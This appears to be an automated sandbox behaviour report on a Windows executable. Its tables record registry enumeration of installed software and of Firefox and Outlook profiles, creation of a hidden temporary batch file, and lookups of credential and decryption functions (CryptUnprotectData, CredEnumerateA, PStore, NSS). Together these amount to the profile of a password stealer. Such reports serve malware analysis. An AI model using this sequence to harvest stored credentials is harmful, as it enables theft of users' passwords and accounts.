| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter | - |
|
5 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs | - |
|
5 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00\0 | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
5 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
3 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\24f93cf8ea9a9546b93f8dc78abb6a97 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3c51f4951df2d34baef1a05b725728d2 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\42405d6c3502e64caa2aeda354771336 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5e8673e5f416694397a90d6dc37f5694 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\600082486368c34683de3c06ff753b3b | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6c393c97bf8f52408197f7e63b61e548 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9fd587aab699e24cb035dd8129bd6b5b | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d9417b97bf6b594d89a41cdbed740112 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e3233d298149174193c9c78f955de155 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e50f0eb5db19ee44ba2717941e28e885 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter | - |
|
2 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs | - |
|
2 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla\Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00\0 | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Mozilla | - |
|
2 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat | show_window = SW_HIDE |
|
1 |
Module (84)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ole32.dll | base_address = 0x77970000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x76050000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | shell32.dll | base_address = 0x767a0000 |
|
2 | |
| Load | netapi32.dll | base_address = 0x747b0000 |
|
1 | |
| Load | kernel32.dll | base_address = 0x761d0000 |
|
1 | |
| Load | msi.dll | base_address = 0x6fa60000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x72e90000 |
|
1 | |
| Load | nss3.dll | base_address = 0x6ddb0000 |
|
2 | |
| Load | mozsqlite3.dll | base_address = 0x0 |
|
2 | |
| Load | sqlite3.dll | base_address = 0x0 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Get Filename | sqlite3.dll | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\3838612080743901967.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = StgOpenStorage, address_out = 0x7798480e |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptUnprotectData, address_out = 0x76085a7f |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertOpenSystemStoreA, address_out = 0x760a5ff0 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertEnumCertificatesInStore, address_out = 0x7605e33a |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CertCloseStore, address_out = 0x7605dd10 |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptAcquireCertificatePrivateKey, address_out = 0x760a5a3b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x767140e6 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CheckTokenMembership, address_out = 0x7670df04 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = FreeSid, address_out = 0x7671412e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateA, address_out = 0x76747381 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredFree, address_out = 0x7670b2ec |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptGetUserKey, address_out = 0x76743228 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptExportKey, address_out = 0x767091ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptDestroyKey, address_out = 0x7670c51a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CryptReleaseContext, address_out = 0x7670e124 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RevertToSelf, address_out = 0x76711562 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = OpenProcessToken, address_out = 0x76714304 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ImpersonateLoggedOnUser, address_out = 0x7670c57a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetTokenInformation, address_out = 0x7671431c |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = ConvertSidToStringSidA, address_out = 0x7673192a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = LogonUserA, address_out = 0x76742654 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x7671404a |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x7671418e |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetFolderPathA, address_out = 0x768b7804 |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetApiBufferFree, address_out = 0x747a13d2 |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetUserEnum, address_out = 0x747859cf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x7620480b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x7621b744 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = MsiGetComponentPathA, address_out = 0x6fb1ecd5 |
|
1 | |
| Get Address | c:\windows\system32\pstorec.dll | function = PStoreCreateInstance, address_out = 0x72e9526c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x7620be77 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x76214785 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x6de6d70b |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x6de6d13c |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSSBase64_DecodeBuffer, address_out = 0x6de6e7d9 |
|
2 | |
